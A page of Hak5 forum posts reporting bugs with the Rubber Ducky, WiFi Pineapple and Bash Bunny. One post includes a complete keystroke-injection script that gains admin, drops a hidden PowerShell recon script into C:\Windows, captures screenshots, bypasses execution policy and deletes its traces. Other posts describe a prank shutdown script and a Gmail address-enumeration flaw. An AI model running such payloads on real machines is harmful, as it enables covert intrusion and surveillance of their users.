Search the Community

Hey Hak5 community, I hope this message finds you well. I wanted to bring up a critical issue regarding the use of the Rubber Ducky with the latest hardware version. It has come to my/our(I dont want to speak for others) attention that using the old firmwares on the new Rubber Ducky can lead to bricking the device. Considering the potential risks involved, I'd like to suggest that the Hak5 team releases a new firmware version along with an updated firmware flasher specifically designed for the new hardware. This will not only address the existing issue but also ensure a smooth and secure user experience. I understand that the Hak5 team is always working hard to improve and enhance the tools we all love, and your attention to this matter is highly appreciated. So if you have time please do it. Also share your thoughts and experiences on this topic, and let's collaborate to make the Rubber Ducky experience as seamless as possible for everyone. Looking forward to hearing from the community and the Hak5 team. Best regards, A User

I have discovered that the Javascript converter doesn't work properly with Firefox. While it seems to do the conversion properly, it won't let the user save the payload (the download box doesn't open). I tried it on both Windows and Linux, with and without add-ons enabled and it doesn't change anything. I checked the debug console and nothing seems to be out of the ordinary as it returns that everything is OK. I also checked with Chrome and there it works flawlessly. Too bad 'cause I want to avoid using Chrome. I tried it with Edge. Same problem as Firefox. And Internet Explorer... completely broken... but what was I to expect?

so, to send some files I want to send over discord, automatically using the rubber ducky, I need to press CMD SHIFT U. Problem is whenever I try and use the online compiler(https://ducktoolkit.com/encoder/) it won't work with all 3 buttons at once... it said to report it, so here's the report

I've had plug in USB Rubber ducky in the script starts running and all was okay. But after that i take some code insert it in the micro SD and I've had also plugged usb into my computer but suddenly red light turned on and script is not working. I changed the script, still red light and its still not working. I also tried to change the micro sd card, but still not working. My code: REM Open cmd GUI r STRING cmd ENTER STRING Hello World!!! encrypted to inject.bin PLEASE HELP ME

I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!

I have this strange quacking behaviour: When i output to notepad, This line is quacking just fine: Q STRING ipconfig /all \> f:\\loot\\test.doc This line is not quacking at all: Q STRING ipconfig /all \> f:\\loot\\test.txt Is this a bug, or am I totally overlooking something? This is my simple test script: LED SETUP ATTACKMODE HID DUCKY_LANG no Q STRING ipconfig all \> f:\\loot\\test.doc Q ENTER Q STRING ipconfig all \> f:\\loot\\test.txt Q ENTER LED G 100 I am on version : 1.3_267 Any help would be greatly appreciated.

I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?

My friend bet me that I couldn't shut down his computer with my rubber ducky, so I decided to prove him wrong. I started writing my code to shutdown his laptop (he has a dual booting linux and windows setup), it works well in linux but in windows it opens start and types e in the search bar instead of going across to shutdown. I have tried "RIGHTARROW" and "RIGHT" and it is using US keyboard. Code: REM Linux Shutdown (needs root user to be logged in) DELAY 550 ALT F2 DELAY 600 STRING poweroff ENTER DELAY 500 REM Windows Shutdown GUI DELAY 250 RIGHT RIGHT ENTER

Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer. When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to exectue When connected through serial, everything acts as normal. I made a github issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57

First of all I'm very new to Linux and ssh i setup mt wifi pineapple nano before installing the micro sd card I quickly found out that I was in desperate need for room so I installed the new card and formatted it with the GUI and rebooted system i could see the sad card mounted in the GUI and in the ssh but the module manager was always freeze after you install any program and try to go back in to the manager I saw another post that said the only way you could fix this bug was to do a factory reset after you've installed and formatted microSD card

Sometimes you discovering a vulnerability when you don’t search for and sometimes finally like this, it’s simply a false alert. More than 70 percents of vulnerabilities I’ve found in my life have no rapport with a security research, but simply due to chance, when doing administrator tasks for example. This day, I decide for a customer that have millions of hit on this website because of a holiday game, to put the content of his website directly in memory for not having iops problems anymore. For doing this i simply use a ramdisk and i make a synchronization from disk (where is stored the code) to ramdisk each minute via rsync. This customers is on a lxc container with 8 GB RAM connected to a separate MySQL server by a private network. The webserver only use less than 1 GB of RAM and the applications less than 500 MB of disk space. So I just create a ramdisk like this : mkdir /home/ramdisk echo "shm /home/ramdisk tmpfs nodev,nosuid,noexec 0 0" >> /etc/fstab mount /home/ramdisk rsync -avz --stats --delete /home/xxxx /home/ramdisk/ After this, i am verifying with a simple df -h and i can see a big suprise : ~# df -h Filesystem Size Used Avail Use% Mounted on zfstore/zfs-containers/subvol-9202234-disk-1 32G 1.4G 31G 5% / none 492K 0 492K 0% /dev tmpfs 26G 68K 26G 1% /run tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1.7G 0 1.7G 0% /run/shm shm 126G 410M 126G 1% /home/ramdisk My /home/ramdisk have a size of 126 G. Just after i verify with and without it, if ram seems used by this but the ram is exactly at the same state. Very excited to probably have found a new vulnerability, i am verifying on a new container on an other cluster and i can reproduce the problem with success. In the same time I am sending an email to a person i know that work on an implementation of this product and it is finally just a display problem : Privileged containers only fail to *show* the used memory (it’s an accounting issue), but after hitting the specified limits you’ll be writing to swap space instead, and ultimately the kernel’s OOM killer will kill the container before it starts using more RAM than assigned (note that both RAM and swap limits have to be hit). End of the story :) -- Christophe Casalegno https://twitter.com/Brain0verride

FW-1.0.2 Sanity Check If you add a list of SSIDs to the PineAP Pool and then try to remove the 1st SSID from the list going down through the individual SSID remove feature it will remove the entire list and will not allow the list to be repopulated with the other SSIDs until you do a full Pool clear. How to reproduce: Manually add or allow PineAP to add more then 1 SSID to the PineAP Pool Select the first SSID in the list going down so that it is populated in the blow field for ADD/REMOVE Select to Remove the SSID and the entire list will be cleared You can re-ADD the selected SSID and remove it however the other SSIDs cannot be re-added until you select "Clear SSID Pool" from the SSID Pool Dropdown. Has anyone else run into this?

hey, I'm encountring difficulties to install an infusion on my PineApple Mark V that running 2.2.0 firmware. -When i try to install an infusion from the PineApple Bar:Available, it needs to download the infusion on SD card. Why it can't install 11kb into 88kb free space? screenshot 1 -So i choose to download on SD card.=> screenshot 2 -It says the infusion is on sd card and it's installing in the web interface => screenshot 3 -When i check the PineApple Bar: Installed. => screenshot 4 I think it's a firmware bug. Can I fixe it by any commands? or should i flash my PineApple? Every Advices are wellcome =) You also can find me on IRC #pineapple

I would like to share this one recent bug i found in gmail. It allows sending a list of about 200 email addresses and validates them if they exist in the google DB or not. This validator script is used by gmail while registering new users (ajax request is sent which shows whether entered email is available or not while user is filling up fields). Its simple XSS. Anyone can send a request containing multiple usernames and gmail replies with answer for every single of them whether it exists or not. Here is my oroginal post and description: http://vincian.blogspot.in/ http://vincian.tx0.org/links/gmail_email_validation.html Just thought of sharing it with hak5 :-)

So, today, with a new problem. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result.

Hi, I am a noob and I tried installin few packages and I got the error: [E: Sub-process /usr/bin/dpkg returned an error code (1)] I got the same error even when removing a package. how do I fix the glitch? Now, when you reply, KEEP IN MIND THAT I'M A NEWBIE. Backtrack5r2-lucid-kde-32bit-installed-dual boot- thanks in advance guys.

Any have any idea why the status page is displaying the php code and not the parsed output? To get a better understanding of what I mean, check out this http://imgur.com/wjeKMwT

Hey, I need some help debugging my new ducky. I've made some simple 'hello world' ducky scripts without any issues. They run on mac, windows, linux etc without any problems. I tried the same simple script in OSX's single user mode with no luck. It appears as though OSX in single user mode does not recognize the ducky as a keyboard? I tried increasing the string delay of the script so that it would type much slower. No luck. I have also tried plugging in external USB keyboards (such as my dell keyboard). Those are all recognized in single user mode. I tried the ducky on desktop Macs and MacBook Pros. Also no difference. Here is a test script: STRING_DELAY 50 DELAY 3000 STRING Hello World ENTER I'm really hoping that I am just making a small mistake. I've tried compiling my ducky script using 2.4, 3.0, and with the online tool. Again, any help would be appreciated! I have a real kickass script for quickly rooting Macs that I would like to share. Thanks!

Dont know if its the wrong forum place. But there's a incorrect url on the cloud.wifipineapple.com page. The "Bug Submission" url is incorrect :p

Now let me start off and say this might be user error, if so you may want to update the the wiki. Hardware Version: Mark IV Firmware Version: See Below What the problem is. In detail: See Below If it is repeatable: Yes (Plug one of the listed USB's in) Any error messages or helpful log output: See References What is running on the pineapple at the time of the bug: Differs Any fixes you have discovered: Downgrading firmware has helped some. Now on to the issue: Something that has just happened to me is I got a USB drive and set it up with a SWAP partition a data partition Etc. When I plug it in the device will ether reboot, or not recognise the entire drive, forcing me to reboot, when it does reboot the WPS light just flashes and the power light is on, other than that it is a brick, you can power-cycle it (after removing the USB drive) and it returns to normal operating status, I have no Idea why it is doing this but it is getting annoying quickly. Now what some have done is downgrade the firmware, if I know of a firmware that works for a usb drive I will list it neat to the drive. List of dirves: https://docs.google.com/spreadsheet/ccc?key=0Arnap5k8HCLydHdHbnFhbTh0N0FaLXRaU0w3NnIzTWc Google drive so I can make it look nice I have no others to list, but there are others, please tell me what one you have and please (if you can) give wattage/voltage incase that may be the problem, if a mod wants to take control of the document PM me. References: http://forums.hak5.o...usb-port-issue/ http://forums.hak5.o..._hl__+usb +port I will try to edit this when I find out more...

I'm not too sure if this should be reported as a bug or not, but I decided to put it in the forum, and if necessary Sebkinne or others can move it. Although this is not a serious problem for me, it would be great if this was an easy fix:) So the thing is that when the Pineapple (2.6.3, and prev) is booted with the Awus036h connected the wlan interfaces get switched. Meaning that the internal wlan interface becomes wlan1. I think this might be related to http://forums.hak5.o...-usb-wlan-boot/ which states that 2.6.3+ should be fixed(at least regarding Ralink RT2501. I'm posting some images to show my findings, and posting logs if needed. This is a fresh booted pineapple, and the awus036h is connected after boot The pineapple is booted with the awus036h inserted. Also the status page says that the internal wifi is not up, although that's what I'm connected via when reporting this. As a sidenote the Network Manager module is not able to bring up the device, Auto-detect or not. I have to ssh in to the Pineapple and issue ifconfig wlan1 up.

In the source for the urlsnarf module version 2.4 on firmware 2.7, the CSS resource is linked as follows: <link rel="stylesheet" type="text/css" href="css/urlsnarf.css" /> <link rel="stylesheet" type="text/css" href="css/firmware.css" /> [/CODE] These files do not exist when installed to USB or internal memory, causing the page to render incorrectly. I've tried removing and re-installing to no avail. Not sure why this is - it seemed to work fine before firmware 2.7 was installed.

Running fw 2.6.1 using a powered hub with a flashdrive. When booting with my Atheros AR9271 (Alfa AWUS036NHA) inserted all is good, pineapple detects it as wlan1 and internal as wlan0 When booting with my Ralink RT2501/RT2573 inserted, pineapple detects it as wlan0 and internal as wlan1. Why is the Ralink assigned as phy0 instead of the internal wlan Only when booting the pineapple without the Ralink and inserting it after boot it will detect as wlan1. dmesg output with both devices inserted: